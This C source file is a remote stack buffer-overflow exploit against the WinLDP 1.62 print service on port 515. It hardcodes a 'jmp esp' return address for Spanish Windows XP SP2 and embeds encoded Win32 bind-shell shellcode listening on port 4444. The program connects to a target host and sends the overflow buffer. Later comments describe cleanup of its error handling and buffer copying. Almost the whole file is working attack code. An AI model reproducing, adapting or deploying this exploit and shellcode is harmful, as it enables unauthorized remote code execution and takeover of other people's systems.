/*
 * WinLDP 1.62/Build 1076 remote exploit
 *
 * It's an old bug, but easy-to-exploit...
 * Just a demonstration of remote exploitation on Win32 systems
 *
 * 07/08/06
 * nitr0us <nitrousenador.at.gmail.dot.com>
 *
 * ZonaRTM - http://www.zonartm.org
 *
*/

#include<errno.h>
#include<stdint.h>
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<winsock.h>

#define BEFORE_EIP	524	/* Bytes before EIP */
/* Some possible return addresses ... */
/* 'jmp esp' @ <ADDRESS> in <DLL> on WinXP SP2 Spanish*/
/*             0x77D27447   user32.dll  */
/*             0x77D5AEC8   user32.dll  */
/*             0x7C951EED   ntdll.dll   */
/*             0x7C9E751C   shell32.dll */
/*             0x7CB4DC6C   shell32.dll */
#define JMP_ESP		0x7CDCB347 // jmp esp @ shell32.dll on WinXP SP2 Spanish

/*
 * Payload appended after the return address by main(): three 16-byte
 * lines of 0x90 (a 48-byte NOP sled) followed by the bytes the original
 * comment labels a Win32 bind shell on port 4444.  Note that
 * sizeof(bindshell), which main() uses for both the command buffer size
 * and the memcpy/send length, counts the implicit trailing NUL as well.
 */
char bindshell[] = 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
/* WIN32 BIND PORT 4444 */ 
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";

/* Print the four-line program banner to stdout. */
void header()
{
	static const char *const banner[] = {
		"-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-\n",
		"-*     WinLDP 1.62 remote exploit      *-\n",
		"-*             by nitr0us              *-\n",
		"-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-\n\n",
	};

	/* The strings contain no conversion specifiers, so fputs() emits
	 * exactly what printf() did. */
	for (size_t i = 0; i < sizeof banner / sizeof banner[0]; i++) {
		fputs(banner[i], stdout);
	}
}

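/*
 * Entry point.  Resolves argv[1], connects to it on port argv[2]
 * (default 515) and sends one buffer laid out as
 * [BEFORE_EIP bytes of 0x90][JMP_ESP][bindshell].
 *
 * Returns 0 once the whole buffer was sent.  Every failure path prints the
 * Winsock error code on stderr and returns -1, the same status the earlier
 * exit(-1) calls produced.  The socket is now closed and WSACleanup() run
 * on every path that reached the matching setup step, so a failed
 * connect()/send() no longer leaks the socket.
 */
int main(int argc, char *argv[])
{
	WSADATA		wsa;
	SOCKET		sfd;
	SOCKADDR_IN	sin;
	HOSTENT		*remote;
	int			sendn;
	int			rc = -1;
	long		port = 515;		/* default port when argv[2] is absent */
	uint32_t	ret = JMP_ESP;	/* 4-byte value stored at offset BEFORE_EIP */
	char		command[BEFORE_EIP + sizeof(ret) + sizeof(bindshell)];

	memset(command, 0x00, sizeof(command));

	if(argc < 2){
		header();
		fprintf(stderr, "Usage: %s <host> [port(default 515)]\n", argv[0]);
		exit(-1);
	}

	/* Parse the optional port with strtol() instead of atoi(): reject
	 * non-numeric text, trailing garbage and anything outside 1..65535
	 * rather than silently sending to port 0. */
	if(argc > 2){
		char *end = NULL;
		errno = 0;
		port = strtol(argv[2], &end, 10);
		if(end == argv[2] || *end != '\0' || errno == ERANGE || port < 1 || port > 65535){
			fprintf(stderr, "Invalid port: %s\n", argv[2]);
			exit(-1);
		}
	}

	if(WSAStartup(MAKEWORD(2, 2), &wsa) != 0){
		fprintf(stderr, "WSAStartup() - Error code: %d\n", WSAGetLastError());
		exit(-1);
	}

	/* h_addr_list[0] is what the h_addr macro expands to; make sure an
	 * address is actually present before copying from it. */
	if((remote = gethostbyname(argv[1])) == NULL || remote->h_addr_list[0] == NULL){
		fprintf(stderr, "gethostbyname() - Cannot resolve hostname. Error code: %d\n", WSAGetLastError());
		goto out_wsa;
	}

	if((sfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET){
		fprintf(stderr, "socket() - Cannot create a socket. Error code: %d\n", WSAGetLastError());
		goto out_wsa;
	}

	memset(&sin, 0x00, sizeof(sin));
	sin.sin_family	= AF_INET;
	sin.sin_port	= htons((u_short)port);
	/* memcpy rather than *(struct in_addr *)h_addr: no alignment assumption */
	memcpy(&sin.sin_addr, remote->h_addr_list[0], sizeof(sin.sin_addr));

	/* ['\x90'xBEFORE_EIP][JMP_ESP][bindshell] */
	memset(command, 0x90, BEFORE_EIP);
	/* Copy the fixed 4-byte value in host byte order.  The previous
	 * *(unsigned long *) store relied on unsigned long being 32-bit and
	 * on an aligned char slot; memcpy produces the same bytes without
	 * either assumption. */
	memcpy(command + BEFORE_EIP, &ret, sizeof(ret));
	/* sizeof(bindshell) includes the terminating NUL, as before. */
	memcpy(command + BEFORE_EIP + sizeof(ret), bindshell, sizeof(bindshell));

	/* Connect & Send */
	if(connect(sfd, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR){
		fprintf(stderr, "connect() - Cannot connect. Error code: %d\n", WSAGetLastError());
		goto out_close;
	}

	header();

	printf("Sending command...\n\n");
	/* send() takes an int length; compare in int to avoid a signed/unsigned mismatch. */
	sendn = send(sfd, command, (int)sizeof(command), 0);
	if(sendn == SOCKET_ERROR || sendn != (int)sizeof(command)){
		fprintf(stderr, "send() - Cannot send. Error code: %d\n", WSAGetLastError());
		goto out_close;
	}

	printf("Sent evil command hehe }:D (%d bytes)\n\n", sendn);
	rc = 0;

out_close:
	closesocket(sfd);
out_wsa:
	WSACleanup();
	return rc;
}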
